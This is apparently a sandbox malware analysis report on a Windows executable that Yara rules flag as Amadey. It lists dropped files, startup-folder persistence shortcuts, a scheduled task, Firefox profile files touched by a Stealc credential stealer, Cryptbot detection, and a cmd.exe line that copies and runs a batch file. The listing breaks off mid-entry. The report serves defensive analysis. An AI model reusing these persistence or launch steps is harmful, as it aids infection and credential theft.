SHA-512:	D1449126F2365F607A390E3B6FECB3BE100BFF9FAE1A773CF5815CAB29EEB72AB4E341022BDE9DE653FD62EDE0FB0C26D9010E524D87060AA364BF92A14E9D01
Malicious:	false
Reputation:	unknown
Preview:	...... WO.+\|`}....D.6.0.n..l&(....mz....3!.d...[..CmK...e.?....1x>I..:MNG).t.......g.4.5^..~....S.-p.b..g..@:.c.%GA}6K........9O.U.L(.\:..!.Y....8....p.se..g..\|.}.....2.W....s....?Qt.N.-O.d(.#..P....#Q.WQ..U............?3~7[........AI...h.\|.2"o..:...}.'T..1........(.8zU.1.m....tfxM..........Gk..1...i....f.eFe.W.+O...Q._ELT...R.h.4....c7.~.....d....V.(%O..b..r.@........m\|...:S. y{..[J..\!.`....%..W' .X.8..^..70.m.4.dy<....=.sG.@I....Y.Z'\.bz.jq..?z..3..6 -z..bha.V.(..^.....&...q{.GYU..#s..}...[.B.r.....[.oH...).48...+.....LB. .4...\..xM..........7.............(....r0J..t....8.P....28.r..=....'+..J n..d2k..Cl....&..J>...8..s...'.st..}..`.y.._.......L...\|p..D....r.i.x..+.Z....Y3?.......l.....r..6xbh..=..S........^.>2....d.=%.X..#....".9.S..tF.c.......Db.....c=he8U..3..1..z}..iD+.}!Q..hE..KiE..@.6...@.#kg3R....b..p.... .?..8..i+.........}.....wP....].og.-.20}N..j=..!.i._m......U.....Z...S6.;.....?,.y...8(.>...b.u........}....

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.00234060222691118
Encrypted:	false
SSDEEP:
MD5:	B8D21AF3D6E1A2EF093FF5B8C354FE9C
SHA1:	F7A608A73B414C47BE37D0CD646F252368BF03E8
SHA-256:	6C51EBCE930F7DFC2E2B7DC58B48399B2173F18DDD720DC14DA7C5D15D58D46F
SHA-512:	5AF6C5997AFEC6190C0EB5D33A1CEB924E1D0BF22F4DF55E416BEF8C8483A8F691B3915C05BFE099647C6495FD48E85586A94C7430F9D4BFC813BA5CA21FAACB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y"g...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.923848015808376
Encrypted:	false
SSDEEP:
MD5:	CF058F0E0C0886F52CDE9D176F3329FA
SHA1:	7A635726AA6C968DF4054BD920C2F4AF33216C82
SHA-256:	34A122E4A7AF968B4854F5D1FD6A0601D284B850FA1A4324F86A59DD11151419
SHA-512:	BDF04F66015A7E2168AC9212AC539BE9C7009E49DAE5CB9CFE5B25EFBF24A13F3D49AC3A0655AD0328B0AA311E26A5298BBFD6226D9686FBAC5967D9BC02863E
Malicious:	false
Reputation:	unknown
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\ProgramData\LgAmARwZ\Application.exe">), ASCII text
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.835479296672176
Encrypted:	false
SSDEEP:
MD5:	76F433B3FBD6C3D0CA94F50293292ECC
SHA1:	55CECBED8CB353B05CE046AD185488FBCB91BED8
SHA-256:	B04B8AD6F41D55D715FEE227F2C1E4D333627FF2A1B89C0F55E35384028F1B32
SHA-512:	829F24BD3474ABB436D4F685FC6EC8172B1D3AD548CFA71B3CD263B0A3FC353AE4CDD0AB925397FDB07BFA859E79711A6C0B7DBDD95B94B419FEDCE60090BDB6
Malicious:	true
Reputation:	unknown
Preview:	[InternetShortcut].URL="C:\ProgramData\LgAmARwZ\Application.exe"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	2464
Entropy (8bit):	3.249921021394619
Encrypted:	false
SSDEEP:
MD5:	572B1014D07A195B79C2FBB8E0C2830F
SHA1:	1509E21481A4CE6B36EB4C0C0F44B840C41E32CD
SHA-256:	D2A270D957C9F242A833F93206BFFD39E7406CC22A87DE936720C16DB96D5A10
SHA-512:	499DB2894AE1629CCAFE0DF4457238AA1378A377F996B5CB26CE8F52DB46943F71ED06DA577785D95CB63766FD0638C4196098DBA16742303E99C84485F1CE9C
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. N.o.v. .. 0.1. .. 2.0.2.4. .0.1.:.2.3.:.0.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.4879049584876896
Encrypted:	false
SSDEEP:
MD5:	84B813CD1AFCBDCC8BAAC41568AEBC5D
SHA1:	5E2D5135ED52B8BE661F86A00E043961A62BD08F
SHA-256:	11F4CE4CB02CC1D0D43E0D3E1C117BED0FBAB2E4DB9FB1C5366EFBDD595DBCB8
SHA-512:	E9EED7AB19217747DD45AD753372E592193FFA1FCE8E5E96EB4D207A9173C11DB8F302B0BCB1912D4B6343439843E94131CB6622D3A8C0609745A9A30CF1F71C
Malicious:	false
Reputation:	unknown
Preview:	.....D.....M....U.*.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948339549086525
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'913'856 bytes
MD5:	08fa512abc42a3d5f8ba6ad72f5c550e
SHA1:	6b38e59bc4dfdebe5396700e918b96fc22a07611
SHA256:	d573c7e78c05a4d3a653269e00635a56516fefa23a8485a29fdecf75ef5b5e18
SHA512:	ee1cec539286e2b3c8dbe792f288004e0c02fdbafdb149da9ce7c5a76105f0af256df25bffd9070179e23cf665804f9b52ffe10c1c598c21fd4050b957a1490d
SSDEEP:	24576:GbEsevvEMsoxrwgtiN+hyt13k5XheTvhDXX4lzvscT01IOBTqRglaWF/SwJMYGjS:f1xZiN+hSk5Xh48lzTI1lqKlfi3E
TLSH:	659533283A251D3DC67A64B0B703A3A56FFF893486D2C8B570C4556CAB01F1E6B5F263
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b9000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F9278AFB3BAh
movlps xmm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b7050	0x10	mahfbdtk
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b7000	0x18	mahfbdtk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	b111b03939ab0586e0c89a2d8d1b82e9	False	0.9973443886239782	data	7.9851176619482	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x4d8	0x400	6be2d48c31ff2048220492b763343b34	False	0.5859375	data	4.954875546270359	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2ab000	0x200	6c0ac510ad12f3440a0fab02aaa2a1d5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mahfbdtk	0x316000	0x1a2000	0x1a1600	e2011628a3dffd88328d04b08f1875d3	False	0.9942348008385744	data	7.953063770644612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
akwexcdv	0x4b8000	0x1000	0x600	008c754d28ca1060073c16fd6620b4da	False	0.5345052083333334	data	4.8008169789768464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b9000	0x3000	0x2200	f01bc92bbd5f20a285f1cafc8a00eeba	False	0.07961856617647059	DOS executable (COM)	1.031760250349678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b7060	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x4b7346	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	00:02:09
Start date:	01/11/2024
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7244c0000
File size:	329'504 bytes
MD5 hash:	3BA1A18A0DC30A0545E7765CB97D8E63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	00:02:09
Start date:	01/11/2024
Path:	C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sppsvc.exe
Imagebase:	0x7ff61f770000
File size:	4'630'384 bytes
MD5 hash:	320823F03672CEB82CC3A169989ABD12
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:02:09
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	00:02:10
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:02:10
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:02:10
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	00:02:10
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa00000
File size:	1'913'856 bytes
MD5 hash:	08FA512ABC42A3D5F8BA6AD72F5C550E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.1376722618.0000000000A01000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.1285449632.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:02:14
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:02:17
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xc50000
File size:	1'913'856 bytes
MD5 hash:	08FA512ABC42A3D5F8BA6AD72F5C550E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.1397149648.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.1356529894.0000000004880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:02:19
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xc50000
File size:	1'913'856 bytes
MD5 hash:	08FA512ABC42A3D5F8BA6AD72F5C550E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.1384745140.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:22:51
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	01:23:00
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xc50000
File size:	1'913'856 bytes
MD5 hash:	08FA512ABC42A3D5F8BA6AD72F5C550E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000003.1830413702.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	01:23:06
Start date:	01/11/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7ac320000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:23:06
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:23:07
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0x770000
File size:	314'368 bytes
MD5 hash:	68A99CF42959DC6406AF26E91D39F523
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:23:17
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"
Imagebase:	0xd0000
File size:	7'110'656 bytes
MD5 hash:	87E4E869971CEC9573811040F6140157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	01:23:22
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"
Imagebase:	0x400000
File size:	1'224'767 bytes
MD5 hash:	5D97C2475C8A4D52E140EF4650D1028B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:23:24
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:23:24
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
